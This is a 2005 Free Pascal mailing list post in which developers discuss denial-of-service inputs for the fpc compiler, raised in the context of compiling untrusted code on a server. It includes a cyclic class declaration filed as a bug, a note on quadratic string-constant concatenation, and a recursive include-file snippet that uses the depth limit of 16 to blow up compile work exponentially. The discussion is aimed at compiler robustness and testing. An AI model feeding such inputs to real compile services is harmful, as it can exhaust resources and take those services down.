On Tue, 06 Dec 2005 11:08:26 +0100 Vincent Snijders <[EMAIL PROTECTED]> wrote:
> Mattias Gaertner wrote: > > On Mon, 5 Dec 2005 18:50:28 +0100 (CET) > > Michael Van Canneyt <[EMAIL PROTECTED]> wrote: > > > > > >> > >>On Mon, 5 Dec 2005, L505 wrote: > >> > >> > >>>Also, a simple macro could end up in a neverending loop and bring down > >>>the server. Lots of other ways to make a compiler go nuts. > >> > >>The Free Pascal compiler checks for recursive expansion. If it goes over > >>16, it stops. > >> > >>In case you prove otherwise, of course, we have a bug... > > > > > > Here is my first fpc DOS attack: > > > > type > > TMyClassA = class; > > > > TMyClassA = class(TMyClassA) > > procedure DoSomething; override; > > end; > > Reported as 4569: > http://www.freepascal.org/bugs/showrec.php3?ID=4569 Thanks. There are more such denial of service attack possibilities. But they don't happen in serious pascal code, so I don't think, they should pollute the bug list. The above is different, as the real bug is that fpc allows cycles and can happen by a single typo. Other potential denial of services attacks: Concatenation of string constants needs O(n^2). s=' ... string ...' +' ... string ...' ... one thousand concatenations ... ; Include directives FPC allows a maximum depth of 16 levels. That means a single include file can create valid n^15 include directives. // fpc has a built-in maximum of include files depth 16 // this can be used for a denial of service attack: {$IFNDEF DOSStarted} {$DEFINE DOSStarted} {$DEFINE Level1} {$I denialofservice.inc} {$ELSE} {$IFDEF Level3}{$UNDEF Level3}{$DEFINE Level4}{$NOTE Level 4}{$ENDIF} {$IFDEF Level2}{$UNDEF Level2}{$DEFINE Level3}{$NOTE Level 3}{$ENDIF} {$IFDEF Level1}{$UNDEF Level1}{$DEFINE Level2}{$NOTE Level 2}{$ENDIF} {$IFNDEF Level4} // increase this till 15 // include n-times {$I denialofservice.inc} {$I denialofservice.inc} {$ENDIF} {$IFDEF Level1}{$UNDEF Level1}{$NOTE Level 0}{$ENDIF} {$IFDEF Level2}{$UNDEF Level2}{$DEFINE Level1}{$NOTE Level1}{$ENDIF} {$IFDEF Level3}{$UNDEF Level3}{$DEFINE Level2}{$NOTE Level2}{$ENDIF} {$IFDEF Level4}{$UNDEF Level4}{$DEFINE Level3}{$NOTE Level3}{$ENDIF} {$ENDIF} > Maybe the test program can be added to the testsuite. ;-) Mattias _______________________________________________ fpc-pascal maillist - fpc-pascal@lists.freepascal.org http://lists.freepascal.org/mailman/listinfo/fpc-pascal
